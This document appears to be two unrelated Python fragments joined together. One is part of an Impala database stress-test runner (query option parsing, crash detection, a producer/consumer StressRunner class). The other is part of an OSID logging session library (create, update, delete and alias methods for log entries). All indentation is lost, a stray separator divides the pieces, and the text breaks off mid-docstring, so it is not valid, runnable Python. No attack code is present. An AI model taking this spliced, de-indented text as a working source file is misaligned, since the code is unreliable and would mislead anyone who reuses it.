# This "proxies through" all the attributes from the Namespace object that are not
# defined in this object via property getters below.
return getattr(self._args, attr)
@property
def common_query_options(self):
# Memoize this, as the integrity checking of --common-query-options need only
# happen once.
if self._common_query_options is not None:
return self._common_query_options
# The stress test sets these, so callers cannot override them.
IGNORE_QUERY_OPTIONS = frozenset([
'ABORT_ON_ERROR',
'MEM_LIMIT',
])
common_query_options = {}
if self._args.common_query_options is not None:
for query_option_and_value in self._args.common_query_options:
try:
query_option, value = query_option_and_value.split('=')
except ValueError:
LOG.error(
"Could not parse --common-query-options: '{common_query_options}'".format(
common_query_options=self._args.common_query_options))
exit(1)
query_option = query_option.upper()
if query_option in common_query_options:
LOG.error(
"Query option '{query_option}' already defined in --common-query-options: "
"'{common_query_options}'".format(
query_option=query_option,
common_query_options=self._args.common_query_options))
exit(1)
elif query_option in IGNORE_QUERY_OPTIONS:
LOG.warn(
"Ignoring '{query_option}' in common query options: '{opt}': "
"The stress test algorithm needs control of this option.".format(
query_option=query_option, opt=self._args.common_query_options))
else:
common_query_options[query_option] = value
LOG.debug("Common query option '{query_option}' set to '{value}'".format(
query_option=query_option, value=value))
self._common_query_options = common_query_options
return self._common_query_options
@property
def runtime_info_path(self):
runtime_info_path = self._args.runtime_info_path
if "{cm_host}" in runtime_info_path:
runtime_info_path = runtime_info_path.format(cm_host=self._args.cm_host)
return runtime_info_path
# To help debug hangs, the stacks of all threads can be printed by sending signal USR1
# to each process.
signal.signal(signal.SIGUSR1, print_stacks)
def print_crash_info_if_exists(impala, start_time):
"""If any impalads are found not running, they will assumed to have crashed and an
error message will be printed to stderr for each stopped impalad. Returns a value
that evaluates to True if any impalads are stopped.
"""
max_attempts = 5
for remaining_attempts in xrange(max_attempts - 1, -1, -1):
try:
crashed_impalads = impala.find_crashed_impalads(start_time)
break
except Timeout as e:
LOG.info(
"Timeout checking if impalads crashed: %s."
% e + (" Will retry." if remaining_attempts else ""))
else:
LOG.error(
"Aborting after %s failed attempts to check if impalads crashed", max_attempts)
raise e
for message in crashed_impalads.itervalues():
print(message, file=sys.stderr)
return crashed_impalads
class StressRunner(object):
"""This class contains functionality related to producing/consuming queries for the
purpose of stress testing Impala.
Queries will be executed in separate processes since python threading is limited
to the use of a single CPU.
"""
# This is the point at which the work queue will block because it is full.
WORK_QUEUE_CAPACITY = 10
def __init__(self):
self.use_kerberos = False
self.common_query_options = {}
self.test_admission_control = False
self._mem_broker = None
self._verify_results = True
self._select_probability = None
# Synchronized blocking work queue for producer/consumers.
self._query_queue = Queue(self.WORK_QUEUE_CAPACITY)
# The Value class provides cross-process shared memory.
self._mem_mb_needed_for_next_query = Value("i", 0)
# This lock provides a way to stop new queries from running. This lock must be
# acquired before writing to the NUM_QUERIES_SUBMITTED metric for the query_runner,
# which is incremented before every query submission.Reading NUM_QUERIES_SUBMITTED is
# allowed without taking this lock.
self._submit_query_lock = Lock()
self.leak_check_interval_mins = None
self._next_leak_check_unix_time = Value("i", 0)
self._max_mem_mb_reported_usage = Value("i", -1) # -1 => Unknown
self._max_mem_mb_usage = Value("i", -1) # -1 => Unknown
self.cancel_probability = 0
self.spill_probability = 0
self.startup_queries_per_sec = 1.0
self.num_successive_errors_needed_to_abort = 1
self._num_successive_errors = Value("i", 0)
self.results_dir = gettempdir()
self._status_headers = [
"Done", "Active", "Executing", "Mem Lmt Ex", "AC Reject", "AC Timeout",
"Cancel", "Err", "Incorrect", "Next Qry Mem Lmt",
"Tot Qry Mem Lmt", "Tracked Mem", "RSS Mem"]
self._num_queries_to_run = None
self._query_producer_thread = None
# This lock is used to synchronize access to the '_query_runners' list and also to all
# the '_past_runners*' members.
self._query_runners_lock = Lock()
| |
runtime=self._runtime,
effective_agent_id=self.get_effective_agent_id(),
proxy=self._proxy)
self._forms[obj_form.get_id().get_identifier()] = not CREATED
return obj_form
@utilities.arguments_not_none
def create_log_entry(self, log_entry_form):
"""Creates a new ``LogEntry``.
arg: log_entry_form (osid.logging.LogEntryForm): the form for
this ``LogEntry``
return: (osid.logging.LogEntry) - the new ``LogEntry``
raise: IllegalState - ``log_entry_form`` already used in a
create transaction
raise: InvalidArgument - one or more of the form elements is
invalid
raise: NullArgument - ``log_entry_form`` is ``null``
raise: OperationFailed - unable to complete request
raise: PermissionDenied - authorization failure
raise: Unsupported - ``log_entry_form`` did not originate from
``get_log_entry_form_for_create()``
*compliance: mandatory -- This method must be implemented.*
"""
collection = JSONClientValidated('logging',
collection='LogEntry',
runtime=self._runtime)
if not isinstance(log_entry_form, ABCLogEntryForm):
raise errors.InvalidArgument('argument type is not an LogEntryForm')
if log_entry_form.is_for_update():
raise errors.InvalidArgument('the LogEntryForm is for update only, not create')
try:
if self._forms[log_entry_form.get_id().get_identifier()] == CREATED:
raise errors.IllegalState('log_entry_form already used in a create transaction')
except KeyError:
raise errors.Unsupported('log_entry_form did not originate from this session')
if not log_entry_form.is_valid():
raise errors.InvalidArgument('one or more of the form elements is invalid')
if 'timestamp' not in log_entry_form._my_map or log_entry_form._my_map['timestamp'] is None:
log_entry_form._my_map['timestamp'] = DateTime.utcnow()
log_entry_form._my_map['agentId'] = str(self.get_effective_agent_id())
insert_result = collection.insert_one(log_entry_form._my_map)
self._forms[log_entry_form.get_id().get_identifier()] = CREATED
result = objects.LogEntry(
osid_object_map=collection.find_one({'_id': insert_result.inserted_id}),
runtime=self._runtime,
proxy=self._proxy)
return result
def can_update_log_entries(self):
"""Tests if this user can update log entries.
A return of true does not guarantee successful authorization. A
return of false indicates that it is known updating a ``Log``
will result in a ``PermissionDenied``. This is intended as a
hint to an application that may not wish to offer update
operations to unauthorized users.
return: (boolean) - ``false`` if ``LogEntry`` modification is
not authorized, ``true`` otherwise
*compliance: mandatory -- This method must be implemented.*
"""
# Implemented from template for
# osid.resource.BinAdminSession.can_update_bins
# NOTE: It is expected that real authentication hints will be
# handled in a service adapter above the pay grade of this impl.
if self._catalog_session is not None:
return self._catalog_session.can_update_catalogs()
return True
@utilities.arguments_not_none
def get_log_entry_form_for_update(self, log_entry_id):
"""Gets the log entry form for updating an existing log.
A new log entry form should be requested for each update
transaction.
arg: log_entry_id (osid.id.Id): the ``Id`` of the
``LogEntry``
return: (osid.logging.LogEntryForm) - the log entry form
raise: NotFound - ``log_entry_id`` is not found
raise: NullArgument - ``log_entry_id`` is ``null``
raise: OperationFailed - unable to complete request
raise: PermissionDenied - authorization failure
*compliance: mandatory -- This method must be implemented.*
"""
# Implemented from template for
# osid.resource.ResourceAdminSession.get_resource_form_for_update_template
collection = JSONClientValidated('logging',
collection='LogEntry',
runtime=self._runtime)
if not isinstance(log_entry_id, ABCId):
raise errors.InvalidArgument('the argument is not a valid OSID Id')
if (log_entry_id.get_identifier_namespace() != 'logging.LogEntry' or
log_entry_id.get_authority() != self._authority):
raise errors.InvalidArgument()
result = collection.find_one({'_id': ObjectId(log_entry_id.get_identifier())})
obj_form = objects.LogEntryForm(osid_object_map=result, runtime=self._runtime, proxy=self._proxy)
self._forms[obj_form.get_id().get_identifier()] = not UPDATED
return obj_form
@utilities.arguments_not_none
def update_log_entry(self, log_entry_form):
"""Updates an existing log entry.
arg: log_entry_form (osid.logging.LogEntryForm): the form
containing the elements to be updated
raise: IllegalState - ``log_entry_form`` already used in an
update transaction
raise: InvalidArgument - the form contains an invalid value
raise: NullArgument - ``log_entry_form`` is ``null``
raise: OperationFailed - unable to complete request
raise: PermissionDenied - authorization failure
raise: Unsupported - ``log_entry_form`` did not originate from
``get_log_entry_form_for_update()``
*compliance: mandatory -- This method must be implemented.*
"""
# Implemented from template for
# osid.resource.ResourceAdminSession.update_resource_template
collection = JSONClientValidated('logging',
collection='LogEntry',
runtime=self._runtime)
if not isinstance(log_entry_form, ABCLogEntryForm):
raise errors.InvalidArgument('argument type is not an LogEntryForm')
if not log_entry_form.is_for_update():
raise errors.InvalidArgument('the LogEntryForm is for update only, not create')
try:
if self._forms[log_entry_form.get_id().get_identifier()] == UPDATED:
raise errors.IllegalState('log_entry_form already used in an update transaction')
except KeyError:
raise errors.Unsupported('log_entry_form did not originate from this session')
if not log_entry_form.is_valid():
raise errors.InvalidArgument('one or more of the form elements is invalid')
collection.save(log_entry_form._my_map)
self._forms[log_entry_form.get_id().get_identifier()] = UPDATED
# Note: this is out of spec. The OSIDs don't require an object to be returned:
return objects.LogEntry(
osid_object_map=log_entry_form._my_map,
runtime=self._runtime,
proxy=self._proxy)
def can_delete_log_entries(self):
"""Tests if this user can delete log entries.
A return of true does not guarantee successful authorization. A
return of false indicates that it is known deleting a
``LogEntry`` will result in a ``PermissionDenied``. This is
intended as a hint to an application that may not wish to offer
delete operations to unauthorized users.
return: (boolean) - ``false`` if ``LogEntry`` deletion is not
authorized, ``true`` otherwise
*compliance: mandatory -- This method must be implemented.*
"""
# Implemented from template for
# osid.resource.BinAdminSession.can_delete_bins
# NOTE: It is expected that real authentication hints will be
# handled in a service adapter above the pay grade of this impl.
if self._catalog_session is not None:
return self._catalog_session.can_delete_catalogs()
return True
@utilities.arguments_not_none
def delete_log_entry(self, log_entry_id):
"""Deletes a ``LogEntry``.
arg: log_entry_id (osid.id.Id): the ``Id`` of the
``log_entry_id`` to remove
raise: NotFound - ``log_entry_id`` not found
raise: NullArgument - ``log_entry_id`` is ``null``
raise: OperationFailed - unable to complete request
raise: PermissionDenied - authorization failure
*compliance: mandatory -- This method must be implemented.*
"""
# Implemented from template for
# osid.resource.ResourceAdminSession.delete_resource_template
collection = JSONClientValidated('logging',
collection='LogEntry',
runtime=self._runtime)
if not isinstance(log_entry_id, ABCId):
raise errors.InvalidArgument('the argument is not a valid OSID Id')
log_entry_map = collection.find_one(
dict({'_id': ObjectId(log_entry_id.get_identifier())},
**self._view_filter()))
objects.LogEntry(osid_object_map=log_entry_map, runtime=self._runtime, proxy=self._proxy)._delete()
collection.delete_one({'_id': ObjectId(log_entry_id.get_identifier())})
def can_manage_log_entry_aliases(self):
"""Tests if this user can manage ``Id`` aliases for log entries.
A return of true does not guarantee successful authorization. A
return of false indicates that it is known changing an alias
will result in a ``PermissionDenied``. This is intended as a
hint to an application that may opt not to offer alias
operations to an unauthorized user.
return: (boolean) - ``false`` if ``LogEntry`` aliasing is not
authorized, ``true`` otherwise
*compliance: mandatory -- This method must be implemented.*
"""
# NOTE: It is expected that real authentication hints will be
# handled in a service adapter above the pay grade of this impl.
return True
@utilities.arguments_not_none
def alias_log_entry(self, log_entry_id, alias_id):
"""Adds an ``Id`` to a ``LogEntry`` for the purpose of creating compatibility.
The primary ``Id`` of the ``LogEntry`` is determined by the
provider. The new ``Id`` performs as an alias to the primary
``Id``. If the alias is a pointer to another log entry, it is
reassigned to the given log entry ``Id``.
arg: log_entry_id (osid.id.Id): the ``Id`` of a ``LogEntry``
arg: alias_id (osid.id.Id): the alias ``Id``
raise: AlreadyExists - ``alias_id`` is already assigned
raise: NotFound - ``log_entry_id`` not found
raise: NullArgument - ``log_entry_id`` or ``alias_id`` is
``null``
raise: OperationFailed - unable to complete request
raise: PermissionDenied - authorization failure
*compliance: mandatory -- This method must be implemented.*
"""
# Implemented from template for
# osid.resource.ResourceAdminSession.alias_resources_template
self._alias_id(primary_id=log_entry_id, equivalent_id=alias_id)
class LogEntryLogSession(abc_logging_sessions.LogEntryLogSession, osid_sessions.OsidSession):
"""This session provides methods to retrieve ``LogEntry`` to ``Log`` mappings.
An entry may appear in multiple ``Logs``. Each ``Log`` may have its
own authorizations governing who is allowed to look at it.
This lookup session defines several views:
* comparative view: elements may be silently omitted or re-ordered
* plenary view: provides a complete result set or is an error
condition
"""
_session_namespace = 'logging.LogEntryLogSession'
def __init__(self, proxy=None, runtime=None, **kwargs):
OsidSession._init_catalog(self, proxy, runtime)
self._catalog_view = COMPARATIVE
self._kwargs = kwargs
def use_comparative_log_view(self):
"""The returns from the lookup methods may omit or translate elements based on this session, such as authorization, and not result in an error.
This view is used when greater interoperability is desired at
the expense of precision.
*compliance: mandatory -- This method is must be implemented.*
"""
# Implemented from template for
# osid.resource.BinLookupSession.use_comparative_bin_view
self._catalog_view = COMPARATIVE
if self._catalog_session is not None:
self._catalog_session.use_comparative_catalog_view()
def use_plenary_log_view(self):
"""A complete view of the ``LogEntry`` and ``Log`` returns is desired.
Methods will return what is requested or result in an error.
This view is used when greater precision is desired at the
expense of interoperability.
*compliance: mandatory -- This method is must be implemented.*
"""
# Implemented from template for
# osid.resource.BinLookupSession.use_plenary_bin_view
self._catalog_view = PLENARY
if self._catalog_session is not None:
self._catalog_session.use_plenary_catalog_view()
def can_lookup_log_entry_log_mappings(self):
"""Tests if this user can perform lookups of logEntry/log mappings.
A return of true does not guarantee successful authorization. A
return of false indicates that it is known lookup methods in
this session will result in a ``PermissionDenied``. This |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.